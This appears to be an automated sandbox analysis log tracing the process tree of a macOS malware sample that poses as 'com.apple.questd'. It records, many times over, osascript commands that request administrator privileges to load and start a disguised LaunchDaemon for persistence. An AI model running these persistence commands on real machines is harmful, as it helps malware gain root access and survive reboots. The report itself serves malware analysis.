Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 731 Parent PID: 639

General

Start time:	19:16:30
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 731 Parent PID: 639

General

Start time:	19:16:30
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 732 Parent PID: 731

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 732 Parent PID: 731

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 20 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 732 Parent PID: 731

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 732 Parent PID: 731

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 732 Parent PID: 731

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 733 Parent PID: 732

General

Start time:	19:16:31
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: efw_cache_update PID: 641 Parent PID: 619

General

Start time:	19:14:52
Start date:	07/06/2021
Path:	/System/Library/PrivateFrameworks/PackageKit.framework/Resources/efw_cache_update
Arguments:	n/a
File size:	43024 bytes
MD5 hash:	1beaf28d77c9c8d87286075e339c2776

Analysis Process: xpcproxy PID: 645 Parent PID: 1

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/libexec/xpcproxy
Arguments:	n/a
File size:	43488 bytes
MD5 hash:	d1bb9a4899f0af921e8188218b20d744

Analysis Process: sudo PID: 645 Parent PID: 1

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/sudo
Arguments:	sudo /Library/AppQuest/com.apple.questd --silent
File size:	365760 bytes
MD5 hash:	60ac5909d06d86e22aace3a863b13690

Analysis Process: sudo PID: 647 Parent PID: 645

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/usr/bin/sudo
Arguments:	n/a
File size:	365760 bytes
MD5 hash:	60ac5909d06d86e22aace3a863b13690

Analysis Process: com.apple.questd PID: 647 Parent PID: 645

General

Start time:	19:14:54
Start date:	07/06/2021
Path:	/Library/AppQuest/com.apple.questd
Arguments:	/Library/AppQuest/com.apple.questd --silent
File size:	87920 bytes
MD5 hash:	322f4fb8f257a2e651b128c41df92b1d

Analysis Process: sh PID: 660 Parent PID: 647

General

Start time:	19:14:56
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 660 Parent PID: 647

General

Start time:	19:14:56
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 661 Parent PID: 660

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 661 Parent PID: 660

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 10 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 661 Parent PID: 660

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 661 Parent PID: 660

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 661 Parent PID: 660

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 662 Parent PID: 661

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 662 Parent PID: 661

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 663 Parent PID: 661

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 663 Parent PID: 661

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 664 Parent PID: 647

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 664 Parent PID: 647

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 665 Parent PID: 664

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 665 Parent PID: 664

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 15 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 665 Parent PID: 664

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 665 Parent PID: 664

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 665 Parent PID: 664

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 666 Parent PID: 665

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 666 Parent PID: 665

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 667 Parent PID: 665

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 667 Parent PID: 665

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 668 Parent PID: 647

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 668 Parent PID: 647

General

Start time:	19:14:57
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 669 Parent PID: 668

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 669 Parent PID: 668

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 16 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 669 Parent PID: 668

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 669 Parent PID: 668

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 669 Parent PID: 668

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 670 Parent PID: 669

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 670 Parent PID: 669

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 671 Parent PID: 669

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 671 Parent PID: 669

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 673 Parent PID: 647

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 673 Parent PID: 647

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 677 Parent PID: 673

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 677 Parent PID: 673

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 18 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 677 Parent PID: 673

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 677 Parent PID: 673

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 677 Parent PID: 673

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 678 Parent PID: 677

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 678 Parent PID: 677

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 679 Parent PID: 677

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 679 Parent PID: 677

General

Start time:	19:14:58
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 700 Parent PID: 647

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 700 Parent PID: 647

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 701 Parent PID: 700

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 701 Parent PID: 700

General

Start time:	19:15:02
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 701 Parent PID: 700

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 701 Parent PID: 700

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 701 Parent PID: 700

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 702 Parent PID: 701

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 702 Parent PID: 701

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 703 Parent PID: 701

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 703 Parent PID: 701

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 704 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 704 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 705 Parent PID: 704

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 705 Parent PID: 704

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 705 Parent PID: 704

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 705 Parent PID: 704

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 705 Parent PID: 704

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 706 Parent PID: 705

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 706 Parent PID: 705

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 707 Parent PID: 705

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 707 Parent PID: 705

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 708 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 708 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 709 Parent PID: 708

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: security_authtrampoline PID: 709 Parent PID: 708

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/libexec/security_authtrampoline
Arguments:	/usr/libexec/security_authtrampoline /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid auth 17 /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	19120 bytes
MD5 hash:	1f0524c40489885f3c9320bace20f852

Analysis Process: uid PID: 709 Parent PID: 708

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: uid PID: 709 Parent PID: 708

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid
Arguments:	/System/Library/ScriptingAdditions/StandardAdditions.osax/Contents/MacOS/uid /bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	17904 bytes
MD5 hash:	4a7c7d86c14c0b15494f8007f7b46aae

Analysis Process: sh PID: 709 Parent PID: 708

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	/bin/sh -c launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: sh PID: 710 Parent PID: 709

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 710 Parent PID: 709

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 711 Parent PID: 709

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: launchctl PID: 711 Parent PID: 709

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/launchctl
Arguments:	launchctl start questd
File size:	124656 bytes
MD5 hash:	17fad4b994d600d0a5b6bc02b55c2c80

Analysis Process: sh PID: 712 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/bin/sh
Arguments:	n/a
File size:	618512 bytes
MD5 hash:	8aa60b22a5d30418a002b340989384dc

Analysis Process: osascript PID: 712 Parent PID: 647

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	osascript -e do shell script 'launchctl load -w /Library/LaunchDaemons/com.apple.questd.plist launchctl start questd' with administrator privileges
File size:	43136 bytes
MD5 hash:	86c0eb9ab6768a4a8e723dcda40bc65a

Analysis Process: osascript PID: 713 Parent PID: 712

General

Start time:	19:15:03
Start date:	07/06/2021
Path:	/usr/bin/osascript
Arguments:	n/a
File size:	43136 bytes
